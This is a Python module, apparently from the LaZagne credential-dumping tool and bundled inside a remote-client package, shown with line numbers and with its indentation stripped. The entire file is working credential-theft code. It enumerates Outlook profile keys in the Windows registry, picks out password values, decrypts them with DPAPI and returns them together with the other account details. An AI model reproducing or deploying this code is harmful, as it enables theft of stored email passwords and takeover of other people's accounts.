1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
|
# -*- coding: utf-8 -*-
try:
import _winreg as winreg
except ImportError:
import winreg
import foreign.client_handling.lazagne.config.winstructure as win
from foreign.client_handling.lazagne.config.module_info import ModuleInfo
from foreign.client_handling.lazagne.config.constant import constant
class Outlook(ModuleInfo):
def __init__(self):
ModuleInfo.__init__(self, 'outlook', 'mails', registry_used=True, winapi_used=True)
def run(self):
key_path = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
try:
hkey = win.OpenKey(win.HKEY_CURRENT_USER, key_path)
except Exception as e:
self.debug(e)
return
num = winreg.QueryInfoKey(hkey)[0]
pwd_found = []
for x in range(0, num):
name = winreg.EnumKey(hkey, x)
skey = win.OpenKey(hkey, name, 0, win.ACCESS_READ)
num_skey = winreg.QueryInfoKey(skey)[0]
if num_skey != 0:
for y in range(0, num_skey):
name_skey = winreg.EnumKey(skey, y)
sskey = win.OpenKey(skey, name_skey)
num_sskey = winreg.QueryInfoKey(sskey)[1]
for z in range(0, num_sskey):
k = winreg.EnumValue(sskey, z)
if 'password' in k[0].lower():
values = self.retrieve_info(sskey, name_skey)
if values:
pwd_found.append(values)
winreg.CloseKey(skey)
winreg.CloseKey(hkey)
return pwd_found
def retrieve_info(self, hkey, name_key):
values = {}
num = winreg.QueryInfoKey(hkey)[1]
for x in range(0, num):
k = winreg.EnumValue(hkey, x)
if 'password' in k[0].lower():
try:
password = win.Win32CryptUnprotectData(k[1][1:], is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi)
values[k[0]] = password.decode('utf16')
except Exception as e:
self.debug(str(e))
values[k[0]] = 'N/A'
else:
try:
values[k[0]] = str(k[1]).decode('utf16')
except Exception:
values[k[0]] = str(k[1])
return values
|